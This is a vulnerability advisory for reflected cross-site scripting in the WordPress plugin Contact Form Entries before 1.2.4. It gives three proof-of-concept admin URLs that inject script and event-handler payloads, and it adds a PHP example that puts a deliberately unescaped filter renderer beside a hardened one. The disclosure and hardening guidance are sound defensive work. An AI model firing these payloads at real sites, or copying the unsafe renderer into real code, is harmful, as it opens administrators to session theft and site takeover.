Contact Form Entries < 1.2.4 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape various request parameters, such as form_id, status, end_date, order, orderby and search, before outputting them back in the admin page, which allows reflected cross-site scripting.

Proof of Concept

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F+ne97l&status&tab=entries&search&order=desc&orderby=fir+

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=&order=asc&orderby=file-438&field=&time=&start_date=&end_date=onobw%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez2u4g

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=e67x3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22oakfc&order=asc&orderby=file-438&field=&time=&start_date=&end_date=
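The root cause described above is the classic one for admin-side reflected XSS in WordPress plugins: filter values from the query string are echoed straight into attributes of the rendered form. The following is an added illustrative example, not the Contact Form Entries plugin's code, showing a hypothetical admin filter form in its weak form beside a hardened one. Parameter names follow the advisory; the markup, the `render_filters_*` function names and the `$allowed_orderby` column list are assumptions. The hardened version uses the real WordPress helpers `wp_unslash`, `sanitize_key`, `sanitize_text_field` and `esc_attr`.

```php
<?php
// Added example, not the plugin's own code. Illustrates the weak pattern
// (raw $_GET values interpolated into HTML) and a hardened equivalent.

// Weak: request values go into attribute context unescaped, so a quote in
// form_id or search breaks out of the attribute (the flaw class in the advisory).
function render_filters_unsafe() {
    $form_id = $_GET['form_id'] ?? '';
    $search  = $_GET['search'] ?? '';
    $order   = $_GET['order'] ?? 'asc';
    echo '<input type="hidden" name="form_id" value="' . $form_id . '">';
    echo '<input type="text" name="search" value="' . $search . '">';
    echo '<input type="hidden" name="order" value="' . $order . '">';
}

// Hardened: whitelist enumerable values, sanitise free text on input,
// and escape for the HTML attribute context at output time.
function render_filters_safe() {
    // form_id is an identifier: sanitize_key() keeps only [a-z0-9_-] (lowercased).
    $form_id = isset( $_GET['form_id'] )
        ? sanitize_key( wp_unslash( $_GET['form_id'] ) )
        : '';

    // search is free text: strip tags and control characters, then escape on output.
    $search = isset( $_GET['search'] )
        ? sanitize_text_field( wp_unslash( $_GET['search'] ) )
        : '';

    // order and orderby only accept known values; anything else falls back to a default.
    $order = ( isset( $_GET['order'] ) && 'desc' === strtolower( (string) $_GET['order'] ) )
        ? 'desc'
        : 'asc';
    $allowed_orderby = array( 'id', 'date', 'status' ); // assumed column list
    $orderby = ( isset( $_GET['orderby'] ) && in_array( $_GET['orderby'], $allowed_orderby, true ) )
        ? $_GET['orderby']
        : 'id';

    // end_date must look like YYYY-MM-DD; otherwise it is dropped entirely.
    $end_date = ( isset( $_GET['end_date'] ) && preg_match( '/^\d{4}-\d{2}-\d{2}$/', (string) $_GET['end_date'] ) )
        ? $_GET['end_date']
        : '';

    // esc_attr() is applied at the point of output regardless of prior sanitisation.
    echo '<input type="hidden" name="form_id" value="' . esc_attr( $form_id ) . '">';
    echo '<input type="text" name="search" value="' . esc_attr( $search ) . '">';
    echo '<input type="hidden" name="order" value="' . esc_attr( $order ) . '">';
    echo '<input type="hidden" name="orderby" value="' . esc_attr( $orderby ) . '">';
    echo '<input type="date" name="end_date" value="' . esc_attr( $end_date ) . '">';
}
```

The two defences are deliberately layered: input validation limits what reaches the page at all (an attacker-controlled orderby never reaches the SQL or the HTML), while output escaping with `esc_attr` guarantees that whatever does get reflected cannot terminate the attribute or inject an event handler. Relying on only one of them is what typically leads to the kind of finding recorded here.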

Affects Plugins

Fixed in 1.2.4

Classification

Type
XSS

Miscellaneous

Original Researcher
Gaetano Perrone
Submitter
Gaetano Perrone
Verified
Yes

Timeline

Publicly Published
2021-11-14
Added
2021-12-24
Last Updated
2022-04-10